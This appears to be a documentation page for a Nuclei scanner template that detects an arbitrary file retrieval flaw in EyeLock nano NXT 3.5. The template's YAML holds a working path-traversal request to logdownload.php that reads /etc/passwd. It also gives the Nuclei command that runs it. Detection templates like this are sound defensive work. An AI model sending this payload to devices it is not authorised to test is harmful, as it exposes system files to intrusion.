EyeLock nano NXT 3.5 - Arbitrary File Retrieval
ID: eyelock-nano-lfd
Severity: high
Author: geeknik
Tags: iot,lfi,eyelock
Description
Section titled “Description”EyeLock nano NXT suffers from a file retrieval vulnerability when input passed through the ‘path’ parameter to ‘logdownload.php’ script is not properly verified before being used to read files. This can be exploited to disclose contents of files from local resources.
YAML Source
Section titled “YAML Source”id: eyelock-nano-lfd
info: name: EyeLock nano NXT 3.5 - Arbitrary File Retrieval author: geeknik severity: high description: EyeLock nano NXT suffers from a file retrieval vulnerability when input passed through the 'path' parameter to 'logdownload.php' script is not properly verified before being used to read files. This can be exploited to disclose contents of files from local resources. reference: - https://www.zeroscience.mk/codes/eyelock_lfd.txt metadata: max-request: 1 tags: iot,lfi,eyelock
http: - method: GET path: - "{{BaseURL}}/scripts/logdownload.php?dlfilename=juicyinfo.txt&path=../../../../../../../../etc/passwd"
matchers-condition: and matchers: - type: status status: - 200
- type: regex regex: - "root:[x*]:0:0:" part: body# digest: 4a0a0047304502210095aeb61bf68e36b64b1dca8242c47b7b3c6cf96753ed8096cac1554dfd9e8bb002203bc38cc235fb89116d560478834a17fdadae2d7e3464b7a1cfc383e010fd8011:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/vulnerabilities/other/eyelock-nano-lfd.yaml"